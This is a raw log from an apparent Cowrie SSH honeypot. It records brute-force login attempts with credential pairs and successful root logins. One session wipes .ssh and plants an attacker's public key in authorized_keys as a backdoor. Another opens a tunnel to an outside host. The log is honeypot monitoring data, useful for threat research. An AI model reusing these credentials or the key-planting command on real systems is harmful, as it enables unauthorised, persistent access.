{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:57:17.535446Z","src_ip":"212.227.235.229","session":"9367a95b883c"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T21:57:18.059539Z","src_ip":"212.227.235.229","session":"ff30bf0b04a8"}
{"eventid":"cowrie.login.failed","username":"webuser","password":"webuser.123","message":"login attempt [webuser/webuser.123] failed","sensor":"my-vps","timestamp":"2025-09-08T21:57:18.803964Z","src_ip":"212.227.235.229","session":"9367a95b883c"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:57:19.352430Z","src_ip":"212.227.235.229","session":"ff30bf0b04a8"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:57:20.112216Z","src_ip":"212.227.235.229","session":"9367a95b883c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50276,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3d102dfa4bb","protocol":"ssh","message":"New connection: 212.227.235.229:50276 (1.2.3.4:22) [session: e3d102dfa4bb]","sensor":"my-vps","timestamp":"2025-09-08T21:57:25.597792Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:57:25.642271Z","src_ip":"212.227.235.229","session":"e3d102dfa4bb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:57:25.844558Z","src_ip":"212.227.235.229","session":"e3d102dfa4bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58432,"dst_ip":"1.2.3.4","dst_port":22,"session":"76c71e8cd3d4","protocol":"ssh","message":"New connection: 212.227.235.229:58432 (1.2.3.4:22) [session: 76c71e8cd3d4]","sensor":"my-vps","timestamp":"2025-09-08T21:57:26.734590Z"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"!","message":"login attempt [esuser/!] failed","sensor":"my-vps","timestamp":"2025-09-08T21:57:26.751589Z","src_ip":"212.227.235.229","session":"e3d102dfa4bb"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:57:26.983100Z","src_ip":"212.227.235.229","session":"76c71e8cd3d4"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:57:27.956399Z","src_ip":"212.227.235.229","session":"e3d102dfa4bb"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":37946,"dst_ip":"1.2.3.4","dst_port":22,"session":"48d470a81257","protocol":"ssh","message":"New connection: 139.19.117.131:37946 (1.2.3.4:22) [session: 48d470a81257]","sensor":"my-vps","timestamp":"2025-09-08T21:57:38.281301Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T21:57:38.282116Z","src_ip":"139.19.117.131","session":"48d470a81257"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-08T21:57:38.299742Z","src_ip":"139.19.117.131","session":"48d470a81257"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"03:7d:9d:08:37:7a:0a:f4:ca:85:4b:d1:94:64:c9:f4","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7+SFcfFs2jdOQsXyljYF4573CrbM1wiz3JUHo7L+kVOI5lQcwIdqtP8jAuN2qyhsLnEpBfG3ulFeAg2VhX6tp7LIa2eNyVceyFoUtAmylL/Zry6j9pZaDXrv3fCtSb2PGKCmZTSJtYClo4i1jMAS/ANDxYBGDLSPB6xi4dt8p0UuDw1UdxBvq3pf5pwmrnMNdK73sRuKHcIBNEYUuSnDdUUuZoHM/tlJolU2w7X2AW8fLw83BkTp+cuKFSkBL0MSMMyQ+5vByM1NC8M50Bka773LESjtUct04h8aVFZYuQY+jeLrD2qwnAndbPjP/iSxgGaqkR9GfzHf7nqCBSkohMUyo2qow7covntqUwskwckTKwgC10aUiMMj2zSaY8pJLT30tKgYXGnl4Kp/dAkcvKBnNwsBQUqhIr/aZSzJluin1lIT+bIya2Y3EMqStwQlUlq04UsE9Mnecuqkbkt4a6VJ1kCERMVNo6FMZ20aQKQPcUGC6hMb/JXoy6vhuvJc=","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 03:7d:9d:08:37:7a:0a:f4:ca:85:4b:d1:94:64:c9:f4","sensor":"my-vps","timestamp":"2025-09-08T21:57:38.336721Z","src_ip":"139.19.117.131","session":"48d470a81257"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"03:7d:9d:08:37:7a:0a:f4:ca:85:4b:d1:94:64:c9:f4","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7+SFcfFs2jdOQsXyljYF4573CrbM1wiz3JUHo7L+kVOI5lQcwIdqtP8jAuN2qyhsLnEpBfG3ulFeAg2VhX6tp7LIa2eNyVceyFoUtAmylL/Zry6j9pZaDXrv3fCtSb2PGKCmZTSJtYClo4i1jMAS/ANDxYBGDLSPB6xi4dt8p0UuDw1UdxBvq3pf5pwmrnMNdK73sRuKHcIBNEYUuSnDdUUuZoHM/tlJolU2w7X2AW8fLw83BkTp+cuKFSkBL0MSMMyQ+5vByM1NC8M50Bka773LESjtUct04h8aVFZYuQY+jeLrD2qwnAndbPjP/iSxgGaqkR9GfzHf7nqCBSkohMUyo2qow7covntqUwskwckTKwgC10aUiMMj2zSaY8pJLT30tKgYXGnl4Kp/dAkcvKBnNwsBQUqhIr/aZSzJluin1lIT+bIya2Y3EMqStwQlUlq04UsE9Mnecuqkbkt4a6VJ1kCERMVNo6FMZ20aQKQPcUGC6hMb/JXoy6vhuvJc=","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T21:57:38.337488Z","src_ip":"139.19.117.131","session":"48d470a81257"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"03:7d:9d:08:37:7a:0a:f4:ca:85:4b:d1:94:64:c9:f4","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7+SFcfFs2jdOQsXyljYF4573CrbM1wiz3JUHo7L+kVOI5lQcwIdqtP8jAuN2qyhsLnEpBfG3ulFeAg2VhX6tp7LIa2eNyVceyFoUtAmylL/Zry6j9pZaDXrv3fCtSb2PGKCmZTSJtYClo4i1jMAS/ANDxYBGDLSPB6xi4dt8p0UuDw1UdxBvq3pf5pwmrnMNdK73sRuKHcIBNEYUuSnDdUUuZoHM/tlJolU2w7X2AW8fLw83BkTp+cuKFSkBL0MSMMyQ+5vByM1NC8M50Bka773LESjtUct04h8aVFZYuQY+jeLrD2qwnAndbPjP/iSxgGaqkR9GfzHf7nqCBSkohMUyo2qow7covntqUwskwckTKwgC10aUiMMj2zSaY8pJLT30tKgYXGnl4Kp/dAkcvKBnNwsBQUqhIr/aZSzJluin1lIT+bIya2Y3EMqStwQlUlq04UsE9Mnecuqkbkt4a6VJ1kCERMVNo6FMZ20aQKQPcUGC6hMb/JXoy6vhuvJc=","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 03:7d:9d:08:37:7a:0a:f4:ca:85:4b:d1:94:64:c9:f4","sensor":"my-vps","timestamp":"2025-09-08T21:57:38.355957Z","src_ip":"139.19.117.131","session":"48d470a81257"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"03:7d:9d:08:37:7a:0a:f4:ca:85:4b:d1:94:64:c9:f4","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7+SFcfFs2jdOQsXyljYF4573CrbM1wiz3JUHo7L+kVOI5lQcwIdqtP8jAuN2qyhsLnEpBfG3ulFeAg2VhX6tp7LIa2eNyVceyFoUtAmylL/Zry6j9pZaDXrv3fCtSb2PGKCmZTSJtYClo4i1jMAS/ANDxYBGDLSPB6xi4dt8p0UuDw1UdxBvq3pf5pwmrnMNdK73sRuKHcIBNEYUuSnDdUUuZoHM/tlJolU2w7X2AW8fLw83BkTp+cuKFSkBL0MSMMyQ+5vByM1NC8M50Bka773LESjtUct04h8aVFZYuQY+jeLrD2qwnAndbPjP/iSxgGaqkR9GfzHf7nqCBSkohMUyo2qow7covntqUwskwckTKwgC10aUiMMj2zSaY8pJLT30tKgYXGnl4Kp/dAkcvKBnNwsBQUqhIr/aZSzJluin1lIT+bIya2Y3EMqStwQlUlq04UsE9Mnecuqkbkt4a6VJ1kCERMVNo6FMZ20aQKQPcUGC6hMb/JXoy6vhuvJc=","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T21:57:38.356568Z","src_ip":"139.19.117.131","session":"48d470a81257"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42623,"dst_ip":"1.2.3.4","dst_port":22,"session":"622b07d87aae","protocol":"ssh","message":"New connection: 212.227.125.160:42623 (1.2.3.4:22) [session: 622b07d87aae]","sensor":"my-vps","timestamp":"2025-09-08T21:57:38.359576Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:57:38.360689Z","src_ip":"212.227.125.160","session":"622b07d87aae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42916,"dst_ip":"1.2.3.4","dst_port":22,"session":"4261c36a2581","protocol":"ssh","message":"New connection: 212.227.125.160:42916 (1.2.3.4:22) [session: 4261c36a2581]","sensor":"my-vps","timestamp":"2025-09-08T21:57:38.467172Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T21:57:38.468066Z","src_ip":"212.227.125.160","session":"4261c36a2581"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T21:57:38.580043Z","src_ip":"212.227.125.160","session":"4261c36a2581"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:57:38.916803Z","src_ip":"212.227.125.160","session":"4261c36a2581"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T21:57:39.029842Z","session":"4261c36a2581"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58724,"dst_ip":"1.2.3.4","dst_port":22,"session":"4706f9dee9db","protocol":"ssh","message":"New connection: 212.227.235.229:58724 (1.2.3.4:22) [session: 4706f9dee9db]","sensor":"my-vps","timestamp":"2025-09-08T21:57:42.632296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:57:42.633465Z","src_ip":"212.227.235.229","session":"4706f9dee9db"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:57:42.807029Z","src_ip":"212.227.235.229","session":"4706f9dee9db"}
{"eventid":"cowrie.login.success","username":"root","password":"Great","message":"login attempt [root/Great] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:57:43.534848Z","src_ip":"212.227.235.229","session":"4706f9dee9db"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:57:43.895707Z","src_ip":"212.227.235.229","session":"4706f9dee9db"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:57:43.896385Z","src_ip":"212.227.235.229","session":"4706f9dee9db"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:57:43.897228Z","src_ip":"212.227.235.229","session":"4706f9dee9db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:57:44.068949Z","src_ip":"212.227.235.229","session":"4706f9dee9db"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:57:44.516574Z","src_ip":"212.227.235.229","session":"4706f9dee9db"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:57:44.517247Z","src_ip":"212.227.235.229","session":"4706f9dee9db"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:57:44.690062Z","src_ip":"212.227.235.229","session":"4706f9dee9db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:57:44.690978Z","src_ip":"212.227.235.229","session":"4706f9dee9db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53218,"dst_ip":"1.2.3.4","dst_port":22,"session":"b69fead2aae3","protocol":"ssh","message":"New connection: 212.227.235.229:53218 (1.2.3.4:22) [session: b69fead2aae3]","sensor":"my-vps","timestamp":"2025-09-08T21:57:44.870590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:57:44.871452Z","src_ip":"212.227.235.229","session":"b69fead2aae3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:57:45.046346Z","src_ip":"212.227.235.229","session":"b69fead2aae3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:57:45.786098Z","src_ip":"212.227.235.229","session":"b69fead2aae3"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:57:46.963548Z","src_ip":"212.227.235.229","session":"b69fead2aae3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53220,"dst_ip":"1.2.3.4","dst_port":22,"session":"774829cbed9e","protocol":"ssh","message":"New connection: 212.227.235.229:53220 (1.2.3.4:22) [session: 774829cbed9e]","sensor":"my-vps","timestamp":"2025-09-08T21:57:47.143314Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:57:47.143967Z","src_ip":"212.227.235.229","session":"774829cbed9e"}
